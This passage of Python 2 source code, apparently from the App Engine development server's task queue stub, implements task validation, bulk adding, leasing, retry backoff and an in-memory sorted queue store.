_VerifyTaskQueueAddRequest(self, request, now): """Checks that a TaskQueueAddRequest is valid. Checks that a TaskQueueAddRequest specifies a valid eta and a valid queue. Args: request: The taskqueue_service_pb.TaskQueueAddRequest to validate. now: A datetime.datetime object containing the current time in UTC. Returns: A taskqueue_service_pb.TaskQueueServiceError indicating any problems with the request or taskqueue_service_pb.TaskQueueServiceError.OK if it is valid. """ if request.eta_usec() < 0: return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA eta = datetime.datetime.utcfromtimestamp(_UsecToSec(request.eta_usec())) max_eta = now + MAX_ETA if eta > max_eta: return taskqueue_service_pb.TaskQueueServiceError.INVALID_ETA queue_name_response = self._ValidateQueueName(request.queue_name()) if queue_name_response != taskqueue_service_pb.TaskQueueServiceError.OK: return queue_name_response if request.has_crontimetable() and self._app_id is None: return taskqueue_service_pb.TaskQueueServiceError.PERMISSION_DENIED if request.mode() == QUEUE_MODE.PULL: max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES else: max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES if request.ByteSize() > max_task_size_bytes: return taskqueue_service_pb.TaskQueueServiceError.TASK_TOO_LARGE return taskqueue_service_pb.TaskQueueServiceError.OK def BulkAdd_Rpc(self, request, response): """Add many tasks to a queue using a single request. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest. See taskqueue_service.proto. response: The taskqueue_service_pb.TaskQueueBulkAddResponse. See taskqueue_service.proto. """ self._ReloadQueuesFromYaml() if not request.add_request(0).queue_name(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) error_found = False task_results_with_chosen_names = set() now = datetime.datetime.utcfromtimestamp(time.time()) for add_request in request.add_request_list(): task_result = response.add_taskresult() result = self._VerifyTaskQueueAddRequest(add_request, now) if result == taskqueue_service_pb.TaskQueueServiceError.OK: if not add_request.task_name(): chosen_name = self._ChooseTaskName() add_request.set_task_name(chosen_name) task_results_with_chosen_names.add(id(task_result)) task_result.set_result( taskqueue_service_pb.TaskQueueServiceError.SKIPPED) else: error_found = True task_result.set_result(result) if error_found: return if (request.add_request(0).has_transaction() or request.add_request(0).has_datastore_transaction()): self._TransactionalBulkAdd(request) else: self._NonTransactionalBulkAdd(request, response, now) for add_request, task_result in zip(request.add_request_list(), response.taskresult_list()): if (task_result.result() == taskqueue_service_pb.TaskQueueServiceError.SKIPPED): task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK) if id(task_result) in task_results_with_chosen_names: task_result.set_chosen_task_name(add_request.task_name()) def _TransactionalBulkAdd(self, request): """Uses datastore.AddActions to associate tasks with a transaction. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the tasks to add. N.B. all tasks in the request have been validated and assigned unique names. """ try: apiproxy_stub_map.MakeSyncCall( 'datastore_v3', 'AddActions', request, api_base_pb.VoidProto()) except apiproxy_errors.ApplicationError, e: raise apiproxy_errors.ApplicationError( e.application_error + taskqueue_service_pb.TaskQueueServiceError.DATASTORE_ERROR, e.error_detail) def _NonTransactionalBulkAdd(self, request, response, now): """Adds tasks to the appropriate _Queue instance. Args: request: The taskqueue_service_pb.TaskQueueBulkAddRequest containing the tasks to add. N.B. all tasks in the request have been validated and those with empty names have been assigned unique names. response: The taskqueue_service_pb.TaskQueueBulkAddResponse to populate with the results. N.B. the chosen_task_name field in the response will not be filled-in. now: A datetime.datetime object containing the current time in UTC. """ queue_mode = request.add_request(0).mode() queue_name = request.add_request(0).queue_name() store = self._queues[queue_name] if store.queue_mode != queue_mode: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) for add_request, task_result in zip(request.add_request_list(), response.taskresult_list()): try: store.Add(add_request, now) except apiproxy_errors.ApplicationError, e: task_result.set_result(e.application_error) else: task_result.set_result(taskqueue_service_pb.TaskQueueServiceError.OK) if (store.queue_mode == QUEUE_MODE.PUSH and store.Oldest() == add_request.eta_usec()): self._update_newest_eta(_UsecToSec(add_request.eta_usec())) def UpdateQueue_Rpc(self, request, response): """Implementation of the UpdateQueue RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. """ queue_name = request.queue_name() response = self._ValidateQueueName(queue_name) is_unknown_queue = ( response == taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) if response != taskqueue_service_pb.TaskQueueServiceError.OK and ( not is_unknown_queue): raise apiproxy_errors.ApplicationError(response) if is_unknown_queue: self._queues[queue_name] = _Queue(request.queue_name()) if self._app_id is not None: self._queues[queue_name].Populate(random.randint(10, 100)) self._queues[queue_name].UpdateQueue_Rpc(request, response) def FetchQueues_Rpc(self, request, response): """Implementation of the FetchQueues RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ self._ReloadQueuesFromYaml() for queue_name in sorted(self._queues): if response.queue_size() > request.max_rows(): break if self._queues[queue_name] is None: continue self._queues[queue_name].FetchQueues_Rpc(request, response) def FetchQueueStats_Rpc(self, request, response): """Implementation of the FetchQueueStats rpc which returns 'random' data. This implementation loads some stats from the task store, the rest are random numbers. Args: request: A taskqueue_service_pb.TaskQueueFetchQueueStatsRequest. response: A taskqueue_service_pb.TaskQueueFetchQueueStatsResponse. """ for queue_name in request.queue_name_list(): stats = response.add_queuestats() if queue_name not in self._queues: stats.set_num_tasks(0) stats.set_oldest_eta_usec(-1) continue store = self._queues[queue_name] stats.set_num_tasks(store.Count()) if stats.num_tasks() == 0: stats.set_oldest_eta_usec(-1) else: stats.set_oldest_eta_usec(store.Oldest()) if random.randint(0, 9) > 0: scanner_info = stats.mutable_scanner_info() scanner_info.set_executed_last_minute(random.randint(0, 10)) scanner_info.set_executed_last_hour(scanner_info.executed_last_minute() + random.randint(0, 100)) scanner_info.set_sampling_duration_seconds(random.random() * 10000.0) scanner_info.set_requests_in_flight(random.randint(0, 10)) def QueryTasks_Rpc(self, request, response): """Implementation of the QueryTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].QueryTasks_Rpc(request, response) def FetchTask_Rpc(self, request, response): """Implementation of the FetchTask RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ self._ReloadQueuesFromYaml() self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].FetchTask_Rpc(request, response) def Delete_Rpc(self, request, response): """Implementation of the Delete RPC. Deletes tasks from the task store. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. """ self._ReloadQueuesFromYaml() def _AddResultForAll(result): for _ in request.task_name_list(): response.add_result(result) if request.queue_name() not in self._queues: _AddResultForAll(taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE) elif self._queues[request.queue_name()] is None: _AddResultForAll( taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE) else: self._queues[request.queue_name()].Delete_Rpc(request, response) def DeleteQueue_Rpc(self, request, response): """Implementation of the DeleteQueue RPC. Tombstones the queue. Args: request: A taskqueue_service_pb.TaskQueueDeleteQueueRequest. response: A taskqueue_service_pb.TaskQueueDeleteQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()] = None def PauseQueue_Rpc(self, request, response): """Implementation of the PauseQueue RPC. Args: request: A taskqueue_service_pb.TaskQueuePauseQueueRequest. response: A taskqueue_service_pb.TaskQueuePauseQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].paused = request.pause() def PurgeQueue_Rpc(self, request, response): """Implementation of the PurgeQueue RPC. Args: request: A taskqueue_service_pb.TaskQueuePurgeQueueRequest. response: A taskqueue_service_pb.TaskQueuePurgeQueueResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].PurgeQueue() def QueryAndOwnTasks_Rpc(self, request, response): """Implementation of the QueryAndOwnTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].QueryAndOwnTasks_Rpc(request, response) def ModifyTaskLease_Rpc(self, request, response): """Implementation of the ModifyTaskLease RPC. Args: request: A taskqueue_service_pb.TaskQueueModifyTaskLeaseRequest. response: A taskqueue_service_pb.TaskQueueModifyTaskLeaseResponse. """ self._CheckQueueForRpc(request.queue_name()) self._queues[request.queue_name()].ModifyTaskLease_Rpc(request, response) class Retry(object): """Task retry caclulator class. Determines if and when a task should next be run """ _default_params = taskqueue_service_pb.TaskQueueRetryParameters() def __init__(self, task, queue): """Constructor. Args: task: A taskqueue_service_pb.TaskQueueQueryTasksResponse_Task instance. May be None. queue: A _Queue instance. May be None. """ if task is not None and task.has_retry_parameters(): self._params = task.retry_parameters() elif queue is not None and queue.retry_parameters is not None: self._params = queue.retry_parameters else: self._params = self._default_params def CanRetry(self, retry_count, age_usec): """Computes whether a task can be retried. Args: retry_count: An integer specifying which retry this is. age_usec: An integer specifying the microseconds since the first try. Returns: True if a task is eligible for retrying. """ if self._params.has_retry_limit() and self._params.has_age_limit_sec(): return (self._params.retry_limit() >= retry_count or self._params.age_limit_sec() >= _UsecToSec(age_usec)) if self._params.has_retry_limit(): return self._params.retry_limit() >= retry_count if self._params.has_age_limit_sec(): return self._params.age_limit_sec() >= _UsecToSec(age_usec) return True def CalculateBackoffUsec(self, retry_count): """Calculates time before the specified retry. Args: retry_count: An integer specifying which retry this is. Returns: The number of microseconds before a task should be retried. """ exponent = min(retry_count - 1, self._params.max_doublings()) linear_steps = retry_count - exponent min_backoff_usec = _SecToUsec(self._params.min_backoff_sec()) max_backoff_usec = _SecToUsec(self._params.max_backoff_sec()) backoff_usec = min_backoff_usec if exponent > 0: backoff_usec *= (2 ** (min(1023, exponent))) if linear_steps > 1: backoff_usec *= linear_steps return int(min(max_backoff_usec, backoff_usec)) class _Queue(object): """A Taskqueue Queue. This class contains all of the properties of a queue and a sorted list of tasks. """ def __init__(self, queue_name, bucket_refill_per_second=DEFAULT_RATE_FLOAT, bucket_capacity=DEFAULT_BUCKET_SIZE, user_specified_rate=DEFAULT_RATE, retry_parameters=None, max_concurrent_requests=None, paused=False, queue_mode=QUEUE_MODE.PUSH, acl=None, _testing_validate_state=None, target=None): self.queue_name = queue_name self.bucket_refill_per_second = bucket_refill_per_second self.bucket_capacity = bucket_capacity self.user_specified_rate = user_specified_rate self.retry_parameters = retry_parameters self.max_concurrent_requests = max_concurrent_requests self.paused = paused self.queue_mode = queue_mode self.acl = acl self.target = target self._testing_validate_state = _testing_validate_state self.task_name_archive = set() self._sorted_by_name = [] self._sorted_by_eta = [] self._sorted_by_tag = [] self._lock = threading.Lock() def VerifyIndexes(self): """Ensures that all three indexes are in a valid state. This method is used by internal tests and should not need to be called in any other circumstances. Raises: AssertionError: if the indexes are not in a valid state. """ assert self._IsInOrder(self._sorted_by_name) assert self._IsInOrder(self._sorted_by_eta) assert self._IsInOrder(self._sorted_by_tag) tasks_by_name = set() tasks_with_tags = set() for name, task in self._sorted_by_name: assert name == task.task_name() assert name not in tasks_by_name tasks_by_name.add(name) if task.has_tag(): tasks_with_tags.add(name) tasks_by_eta = set() for eta, name, task in self._sorted_by_eta: assert name == task.task_name() assert eta == task.eta_usec() assert name not in tasks_by_eta tasks_by_eta.add(name) assert tasks_by_eta == tasks_by_name tasks_by_tag = set() for tag, eta, name, task in self._sorted_by_tag: assert name == task.task_name() assert eta == task.eta_usec() assert task.has_tag() and task.tag() assert tag == task.tag() assert name not in tasks_by_tag tasks_by_tag.add(name) assert tasks_by_tag == tasks_with_tags @staticmethod def _IsInOrder(l): """Determine if the specified list is in ascending order. Args: l: The list to check Returns: True if the list is in order, False otherwise """ sorted_list = sorted(l) return l == sorted_list def _WithLock(f): """Runs the decorated function within self._lock. Args: f: The function to be delegated to. Must be a member function (take self as the first parameter). Returns: The result of f. """ def _Inner(self, *args, **kwargs): with self._lock: ret = f(self, *args, **kwargs) if self._testing_validate_state: self.VerifyIndexes() return ret _Inner.__doc__ = f.__doc__ return _Inner @_WithLock def UpdateQueue_Rpc(self, request, response): """Implementation of the UpdateQueue RPC. Args: request: A taskqueue_service_pb.TaskQueueUpdateQueueRequest. response: A taskqueue_service_pb.TaskQueueUpdateQueueResponse. """ assert request.queue_name() == self.queue_name self.bucket_refill_per_second = request.bucket_refill_per_second() self.bucket_capacity = request.bucket_capacity() if request.has_user_specified_rate(): self.user_specified_rate = request.user_specified_rate() else: self.user_specified_rate = None if request.has_retry_parameters(): self.retry_parameters = request.retry_parameters() else: self.retry_parameters = None if request.has_max_concurrent_requests(): self.max_concurrent_requests = request.max_concurrent_requests() else: self.max_concurrent_requests = None self.queue_mode = request.mode() if request.has_acl(): self.acl = request.acl() else: self.acl = None @_WithLock def FetchQueues_Rpc(self, request, response): """Fills out a queue message on the provided TaskQueueFetchQueuesResponse. Args: request: A taskqueue_service_pb.TaskQueueFetchQueuesRequest. response: A taskqueue_service_pb.TaskQueueFetchQueuesResponse. """ response_queue = response.add_queue() response_queue.set_queue_name(self.queue_name) response_queue.set_bucket_refill_per_second( self.bucket_refill_per_second) response_queue.set_bucket_capacity(self.bucket_capacity) if self.user_specified_rate is not None: response_queue.set_user_specified_rate(self.user_specified_rate) if self.max_concurrent_requests is not None: response_queue.set_max_concurrent_requests( self.max_concurrent_requests) if self.retry_parameters is not None: response_queue.retry_parameters().CopyFrom(self.retry_parameters) response_queue.set_paused(self.paused) if self.queue_mode is not None: response_queue.set_mode(self.queue_mode) if self.acl is not None: response_queue.mutable_acl().CopyFrom(self.acl) @_WithLock def QueryTasks_Rpc(self, request, response): """Implementation of the QueryTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryTasksResponse. """ assert not request.has_start_tag() if request.has_start_eta_usec(): tasks = self._LookupNoAcquireLock(request.max_rows(), name=request.start_task_name(), eta=request.start_eta_usec()) else: tasks = self._LookupNoAcquireLock(request.max_rows(), name=request.start_task_name()) for task in tasks: response.add_task().MergeFrom(task) @_WithLock def FetchTask_Rpc(self, request, response): """Implementation of the FetchTask RPC. Args: request: A taskqueue_service_pb.TaskQueueFetchTaskRequest. response: A taskqueue_service_pb.TaskQueueFetchTaskResponse. """ task_name = request.task_name() pos = self._LocateTaskByName(task_name) if pos is None: if task_name in self.task_name_archive: error = taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK else: error = taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK raise apiproxy_errors.ApplicationError(error) _, task = self._sorted_by_name[pos] response.mutable_task().add_task().CopyFrom(task) @_WithLock def Delete_Rpc(self, request, response): """Implementation of the Delete RPC. Deletes tasks from the task store. We mimic a 1/20 chance of a TRANSIENT_ERROR when the request has an app_id. Args: request: A taskqueue_service_pb.TaskQueueDeleteRequest. response: A taskqueue_service_pb.TaskQueueDeleteResponse. """ for taskname in request.task_name_list(): if request.has_app_id() and random.random() <= 0.05: response.add_result( taskqueue_service_pb.TaskQueueServiceError.TRANSIENT_ERROR) else: response.add_result(self._DeleteNoAcquireLock(taskname)) def _QueryAndOwnTasksGetTaskList(self, max_rows, group_by_tag, now_eta_usec, tag=None): assert self._lock.locked() if group_by_tag and tag: return self._IndexScan(self._sorted_by_tag, start_key=(tag, None, None,), end_key=(tag, now_eta_usec, None,), max_rows=max_rows) elif group_by_tag: tasks = self._IndexScan(self._sorted_by_eta, start_key=(None, None,), end_key=(now_eta_usec, None,), max_rows=max_rows) if not tasks: return [] if tasks[0].has_tag(): tag = tasks[0].tag() return self._QueryAndOwnTasksGetTaskList( max_rows, True, now_eta_usec, tag) else: return [task for task in tasks if not task.has_tag()] else: return self._IndexScan(self._sorted_by_eta, start_key=(None, None,), end_key=(now_eta_usec, None,), max_rows=max_rows) @_WithLock def QueryAndOwnTasks_Rpc(self, request, response): """Implementation of the QueryAndOwnTasks RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. """ if self.queue_mode != QUEUE_MODE.PULL: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) lease_seconds = request.lease_seconds() if lease_seconds < 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) max_tasks = request.max_tasks() if max_tasks <= 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) if request.has_tag() and not request.group_by_tag(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST, 'Tag specified, but group_by_tag was not.') now_eta_usec = _SecToUsec(time.time()) tasks = self._QueryAndOwnTasksGetTaskList( max_tasks, request.group_by_tag(), now_eta_usec, request.tag()) tasks_to_delete = [] for task in tasks: retry = Retry(task, self) if not retry.CanRetry(task.retry_count() + 1, 0): logging.warning( 'Task %s in queue %s cannot be leased again after %d leases.', task.task_name(), self.queue_name, task.retry_count()) tasks_to_delete.append(task) continue self._PostponeTaskNoAcquireLock( task, now_eta_usec + _SecToUsec(lease_seconds)) task_response = response.add_task() task_response.set_task_name(task.task_name()) task_response.set_eta_usec(task.eta_usec()) task_response.set_retry_count(task.retry_count()) if task.has_tag(): task_response.set_tag(task.tag()) task_response.set_body(task.body()) for task in tasks_to_delete: self._DeleteNoAcquireLock(task.task_name()) @_WithLock def ModifyTaskLease_Rpc(self, request, response): """Implementation of the ModifyTaskLease RPC. Args: request: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksRequest. response: A taskqueue_service_pb.TaskQueueQueryAndOwnTasksResponse. """ if self.queue_mode != QUEUE_MODE.PULL: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_MODE) if self.paused: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.QUEUE_PAUSED) lease_seconds = request.lease_seconds() if lease_seconds < 0: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.INVALID_REQUEST) pos = self._LocateTaskByName(request.task_name()) if pos is None: if request.task_name() in self.task_name_archive: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK) else: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK) _, task = self._sorted_by_name[pos] if task.eta_usec() != request.eta_usec(): raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED) now_usec = _SecToUsec(time.time()) if task.eta_usec() < now_usec: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TASK_LEASE_EXPIRED) future_eta_usec = now_usec + _SecToUsec(lease_seconds) self._PostponeTaskNoAcquireLock( task, future_eta_usec, increase_retries=False) response.set_updated_eta_usec(future_eta_usec) @_WithLock def IncRetryCount(self, task_name): """Increment the retry count of a task by 1. Args: task_name: The name of the task to update. """ pos = self._LocateTaskByName(task_name) assert pos is not None, ( 'Task does not exist when trying to increase retry count.') task = self._sorted_by_name[pos][1] self._IncRetryCount(task) def _IncRetryCount(self, task): assert self._lock.locked() retry_count = task.retry_count() task.set_retry_count(retry_count + 1) task.set_execution_count(task.execution_count() + 1) @_WithLock def GetTasksAsDicts(self): """Gets all of the tasks in this queue. Returns: A list of dictionaries, where each dictionary contains one task's attributes. E.g. [{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskExecutionCount': '1'), ('X-AppEngine-TaskRetryCount': '1'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('X-AppEngine-TaskPreviousResponse': '300'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. """ tasks = [] now = datetime.datetime.utcnow() for _, _, task_response in self._sorted_by_eta: tasks.append(QueryTasksResponseToDict( self.queue_name, task_response, now)) return tasks @_WithLock def GetTaskAsDict(self, task_name): """Gets a specific task from this queue. Returns: A dictionary containing one task's attributes. E.g. [{'name': 'task-123', 'queue_name': 'default', 'url': '/update', 'method': 'GET', 'eta': '2009/02/02 05:37:42', 'eta_delta': '0:00:06.342511 ago', 'body': '', 'headers': [('user-header', 'some-value') ('X-AppEngine-QueueName': 'update-queue'), ('X-AppEngine-TaskName': 'task-123'), ('X-AppEngine-TaskExecutionCount': '1'), ('X-AppEngine-TaskRetryCount': '1'), ('X-AppEngine-TaskETA': '1234567890.123456'), ('X-AppEngine-Development-Payload': '1'), ('X-AppEngine-TaskPreviousResponse': '300'), ('Content-Length': 0), ('Content-Type': 'application/octet-stream')] Raises: ValueError: A task request contains an unknown HTTP method type. """ task_responses = self._LookupNoAcquireLock(maximum=1, name=task_name) if not task_responses: return task_response, = task_responses if task_response.task_name() != task_name: return now = datetime.datetime.utcnow() return QueryTasksResponseToDict(self.queue_name, task_response, now) @_WithLock def PurgeQueue(self): """Removes all content from the queue.""" self._sorted_by_name = [] self._sorted_by_eta = [] self._sorted_by_tag = [] @_WithLock def _GetTasks(self): """Helper method for tests returning all tasks sorted by eta. Returns: A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects sorted by eta. """ return self._GetTasksNoAcquireLock() def _GetTasksNoAcquireLock(self): """Helper method for tests returning all tasks sorted by eta. Returns: A list of taskqueue_service_pb.TaskQueueQueryTasksResponse_Task objects sorted by eta. """ assert self._lock.locked() tasks = [] for eta, task_name, task in self._sorted_by_eta: tasks.append(task) return tasks def _InsertTask(self, task): """Insert a task into the store, keeps lists sorted. Args: task: the new task. """ assert self._lock.locked() eta = task.eta_usec() name = task.task_name() bisect.insort_left(self._sorted_by_eta, (eta, name, task)) if task.has_tag(): bisect.insort_left(self._sorted_by_tag, (task.tag(), eta, name, task)) bisect.insort_left(self._sorted_by_name, (name, task)) self.task_name_archive.add(name) @_WithLock def RunTaskNow(self, task): """Change the eta of a task to now. Args: task: The TaskQueueQueryTasksResponse_Task run now. This must be stored in this queue (otherwise an AssertionError is raised). """ self._PostponeTaskNoAcquireLock(task, 0, increase_retries=False) @_WithLock def PostponeTask(self, task, new_eta_usec): """Postpone the task to a future time and increment the retry count. Args: task: The TaskQueueQueryTasksResponse_Task to postpone. This must be stored in this queue (otherwise an AssertionError is raised). new_eta_usec: The new eta to set on the task. This must be greater then the current eta on the task. """ assert new_eta_usec > task.eta_usec() self._PostponeTaskNoAcquireLock(task, new_eta_usec) def _PostponeTaskNoAcquireLock(self, task, new_eta_usec, increase_retries=True): assert self._lock.locked() if increase_retries: self._IncRetryCount(task) name = task.task_name() eta = task.eta_usec() assert self._RemoveTaskFromIndex( self._sorted_by_eta, (eta, name, None), task) if task.has_tag(): assert self._RemoveTaskFromIndex( self._sorted_by_tag, (task.tag(), eta, name, None), task) self._PostponeTaskInsertOnly(task, new_eta_usec) def _PostponeTaskInsertOnly(self, task, new_eta_usec): assert self._lock.locked() task.set_eta_usec(new_eta_usec) name = task.task_name() bisect.insort_left(self._sorted_by_eta, (new_eta_usec, name, task)) if task.has_tag(): tag = task.tag() bisect.insort_left(self._sorted_by_tag, (tag, new_eta_usec, name, task)) @_WithLock def Lookup(self, maximum, name=None, eta=None): """Lookup a number of sorted tasks from the store. If 'eta' is specified, the tasks are looked up in a list sorted by 'eta', then 'name'. Otherwise they are sorted by 'name'. We need to be able to sort by 'eta' and 'name' because tasks can have identical eta. If you had 20 tasks with the same ETA, you wouldn't be able to page past them, since the 'next eta' would give the first one again. Names are unique, though. Args: maximum: the maximum number of tasks to return. name: a task name to start with. eta: an eta to start with. Returns: A list of up to 'maximum' tasks. Raises: ValueError: if the task store gets corrupted. """ return self._LookupNoAcquireLock(maximum, name, eta) def _IndexScan(self, index, start_key, end_key=None, max_rows=None): """Return the result of a 'scan' over the given index. The scan is inclusive of start_key and exclusive of end_key. It returns at most max_rows from the index. Args: index: One of the index lists, eg self._sorted_by_tag. start_key: The key to start at. end_key: Optional end key. max_rows: The maximum number of rows to yield. Returns: a list of up to 'max_rows' TaskQueueQueryTasksResponse_Task instances from the given index, in sorted order. """ assert self._lock.locked() start_pos = bisect.bisect_left(index, start_key) end_pos = INF if end_key is not None: end_pos = bisect.bisect_left(index, end_key) if max_rows is not None: end_pos = min(end_pos, start_pos + max_rows) end_pos = min(end_pos, len(index)) tasks = [] for pos in xrange(start_pos, end_pos): tasks.append(index[pos][-1]) return tasks def _LookupNoAcquireLock(self, maximum, name=None, eta=None, tag=None): assert self._lock.locked() if tag is not None: return self._IndexScan(self._sorted_by_tag, start_key=(tag, eta, name,), end_key=('%s\x00' % tag, None, None,), max_rows=maximum) elif eta is not None: return self._IndexScan(self._sorted_by_eta, start_key=(eta, name,), max_rows=maximum) else: return self._IndexScan(self._sorted_by_name, start_key=(name,), max_rows=maximum) @_WithLock def Count(self): """Returns the number of tasks in the store.""" return len(self._sorted_by_name) @_WithLock def OldestTask(self): """Returns the task with the oldest eta in the store.""" if self._sorted_by_eta: return self._sorted_by_eta[0][2] return None @_WithLock def Oldest(self): """Returns the oldest eta in the store, or None if no tasks.""" if self._sorted_by_eta: return self._sorted_by_eta[0][0] return None def _LocateTaskByName(self, task_name): """Locate the index of a task in _sorted_by_name list. If the task does not exist in the list, return None. Args: task_name: Name of task to be located. Returns: Index of the task in _sorted_by_name list if task exists, None otherwise. """ assert self._lock.locked() pos = bisect.bisect_left(self._sorted_by_name, (task_name,)) if (pos >= len(self._sorted_by_name) or self._sorted_by_name[pos][0] != task_name): return None return pos @_WithLock def Add(self, request, now): """Inserts a new task into the store. Args: request: A taskqueue_service_pb.TaskQueueAddRequest. now: A datetime.datetime object containing the current time in UTC. Raises: apiproxy_errors.ApplicationError: If a task with the same name is already in the store, or the task is tombstoned. """ if self._LocateTaskByName(request.task_name()) is not None: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TASK_ALREADY_EXISTS) if request.task_name() in self.task_name_archive: raise apiproxy_errors.ApplicationError( taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK) now_sec = calendar.timegm(now.utctimetuple()) task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task() task.set_task_name(request.task_name()) task.set_eta_usec(request.eta_usec()) task.set_creation_time_usec(_SecToUsec(now_sec)) task.set_retry_count(0) task.set_method(request.method()) if request.has_url(): task.set_url(request.url()) for keyvalue in request.header_list(): header = task.add_header() header.set_key(keyvalue.key()) header.set_value(keyvalue.value()) if request.has_description(): task.set_description(request.description()) if request.has_body(): task.set_body(request.body()) if request.has_crontimetable(): task.mutable_crontimetable().set_schedule( request.crontimetable().schedule()) task.mutable_crontimetable().set_timezone( request.crontimetable().timezone()) if request.has_retry_parameters(): task.mutable_retry_parameters().CopyFrom(request.retry_parameters()) if request.has_tag(): task.set_tag(request.tag()) self._InsertTask(task) @_WithLock def Delete(self, name): """Deletes a task from the store by name. Args: name: the name of the task to delete. Returns: TaskQueueServiceError.UNKNOWN_TASK: if the task is unknown. TaskQueueServiceError.INTERNAL_ERROR: if the store is corrupted. TaskQueueServiceError.TOMBSTONED: if the task was deleted. TaskQueueServiceError.OK: otherwise. """ return self._DeleteNoAcquireLock(name) def _RemoveTaskFromIndex(self, index, index_tuple, task): """Remove a task from the specified index. Args: index: The index list that needs to be mutated. index_tuple: The tuple to search for in the index. task: The task instance that is expected to be stored at this location. Returns: True if the task was successfully removed from the index, False otherwise. """ assert self._lock.locked() pos = bisect.bisect_left(index, index_tuple) if index[pos][-1] is not task: logging.debug('Expected %s, found %s', task, index[pos][-1]) return False index.pop(pos) return True def _DeleteNoAcquireLock(self, name): assert self._lock.locked() pos = self._LocateTaskByName(name) if pos is None: if name in self.task_name_archive: return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_TASK else: return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_TASK old_task = self._sorted_by_name.pop(pos)[-1] eta = old_task.eta_usec() if not self._RemoveTaskFromIndex( self._sorted_by_eta, (eta, name, None), old_task): return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR if old_task.has_tag(): tag = old_task.tag() if not self._RemoveTaskFromIndex( self._sorted_by_tag, (tag, eta, name, None), old_task): return taskqueue_service_pb.TaskQueueServiceError.INTERNAL_ERROR return taskqueue_service_pb.TaskQueueServiceError.OK @_WithLock def Populate(self, num_tasks): """Populates the store with a number of tasks. Args: num_tasks: the number of tasks to insert. """ def RandomTask(): """Creates a new task and randomly populates values.""" assert self._lock.locked() task = taskqueue_service_pb.TaskQueueQueryTasksResponse_Task() task.set_task_name(''.join(random.choice(string.ascii_lowercase) for x in range(20))) task.set_eta_usec(now_usec + random.randint(_SecToUsec(-10), _SecToUsec(600))) task.set_creation_time_usec(min(now_usec, task.eta_usec()) - random.randint(0, _SecToUsec(20))) task.set_url(random.choice(['/a', '/b', '/c', '/d'])) if random.random() < 0.2: task.set_method( taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST) task.set_body('A' * 2000) else: task.set_method( 